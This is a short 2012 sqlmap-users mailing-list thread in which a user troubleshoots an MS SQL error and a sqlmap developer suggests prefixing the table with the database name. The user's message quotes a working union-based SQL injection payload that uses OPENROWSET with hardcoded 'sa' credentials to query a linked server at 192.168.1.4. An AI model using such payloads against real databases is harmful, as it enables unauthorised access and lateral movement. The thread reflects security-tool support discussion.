Re: [sqlmap-users] error with ms sql

[Adi M. <adi...@ya...>]

Hi Miroslav,

got db_name  master and tried with master.resultabcd but i get the same error.

Kind Regards,
A.


________________________________
 From: Miroslav Stampar <mir...@gm...>
To: Adi Mutu <adi...@ya...> 
Cc: "sql...@li..." <sql...@li...> 
Sent: Thursday, June 21, 2012 11:11 AM
Subject: Re: [sqlmap-users] error with ms sql
 

Hi Adi.

You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)

Kind regards,
Miroslav Stampar


On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote:

I'm having an injection like this:
>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
>
>
>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',  ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>
>
>
>and when I try to select form resultabcd i get:
>[OLE/DB provider returned message: Deferred prepare could not be completed.]
>
>
>
>could not find a good answer with google. Thanks.
>
>
>Kind regards,
>A.
>------------------------------------------------------------------------------
>Live Security Virtual Conference
>Exclusive live event will cover all the ways today's security and
>threat landscape has changed and how IT managers can respond. Discussions
>will include endpoint security, mobile security and the latest in malware
>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>_______________________________________________
>sqlmap-users mailing list
>sql...@li...
>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm